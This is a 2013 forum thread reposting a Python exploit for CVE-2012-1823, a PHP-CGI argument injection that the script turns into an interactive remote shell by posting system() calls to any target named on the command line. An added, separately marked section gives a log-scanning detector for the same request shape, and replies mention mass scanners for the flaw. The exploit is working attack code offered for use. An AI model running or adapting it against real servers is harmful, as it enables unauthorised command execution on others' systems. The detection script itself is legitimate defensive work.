Nytro Posted January 3, 2013

PHP-CGI Argument Injection Remote Code Execution

```python
#!/usr/bin/python
import requests
import sys

print """
CVE-2012-1823 PHP-CGI Arguement Injection Remote Code Execution
This exploit abuses an arguement injection in the PHP-CGI wrapper
to execute code as the PHP user/webserver user.
Feel free to give me abuse about this <3
- infodox | insecurety.net | @info_dox"""

if len(sys.argv) != 2:
    print "Usage: ./cve-2012-1823.py <target>"
    sys.exit(0)

target = sys.argv[1]
url = """http://""" + target + """/?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input"""
lol = """<?php system('"""
lol2 = """');die(); ?>"""
print "[+] Connecting and spawning a shell..."
while True:
    try:
        bobcat = raw_input("%s:~$ " %(target))
        lulz = lol + bobcat + lol2
        hax = requests.post(url, lulz)
        print hax.text
    except KeyboardInterrupt:
        print "\n[-] Quitting"
        sys.exit(1)
```

Source: PHP-CGI Argument Injection Remote Code Execution - CXSecurity WLB
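Added example, not part of the original post or of the exploit author's code: a log check for the request shape the script above sends, namely a query string with no unencoded `=` whose decoded form starts with `-`, which a CGI-mode PHP binary receives as command-line switches. The function names and the sample log lines are constructed for illustration, and the combined access-log layout is an assumption.

```python
import re
from urllib.parse import unquote_plus

# Request line inside a combined-format access log entry (assumed layout).
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')


def cgi_switches(target):
    """Return the switches a request target would hand to php-cgi, else []."""
    _, sep, query = target.partition("?")
    # CGI only turns the query string into argv when it has no unencoded '='.
    if not sep or "=" in query:
        return []
    # Decode before testing, so an encoded leading hyphen is still caught.
    decoded = unquote_plus(query).lstrip()
    if not decoded.startswith("-"):
        return []
    return decoded.split()


def scan(lines):
    """Yield (client_ip, method, switches) for each suspicious log line."""
    for line in lines:
        match = REQUEST_RE.search(line)
        if not match:
            continue
        switches = cgi_switches(match.group("target"))
        if switches:
            yield line.split(" ", 1)[0], match.group("method"), switches


# Constructed sample lines (documentation address ranges, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [03/Jan/2013:10:00:01 +0000] "GET /index.php?id=-1 HTTP/1.1" 200 512',
    '198.51.100.7 - - [03/Jan/2013:10:00:02 +0000] "POST /?-d+allow_url_include%3d1'
    '+-d+auto_prepend_file%3dphp://input HTTP/1.1" 200 87',
    '192.0.2.10 - - [03/Jan/2013:10:00:04 +0000] "GET /search.php?q=a+-d+b HTTP/1.1" 200 900',
    '192.0.2.11 - - [03/Jan/2013:10:00:05 +0000] "GET /news.php?page2 HTTP/1.1" 200 300',
]

if __name__ == "__main__":
    for ip, method, switches in scan(SAMPLE_LOG):
        print(ip, method, " ".join(switches))
```

A hit that sets `allow_url_include` and `auto_prepend_file` on a POST, as in the second sample line, matches the request this script builds; the POST body, which access logs normally do not record, carries the PHP code.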
nAb.h4x Posted January 4, 2013

Nice. OFF: It would be cool if we found a Remote Code Execution in Google :)

ilbr22 Posted January 4, 2013

I have a scanner for it; it doesn't catch much...

wind Posted January 7, 2013

> I have a scanner for it; it doesn't catch much...

It's kind of a mess, I made a mass one too ..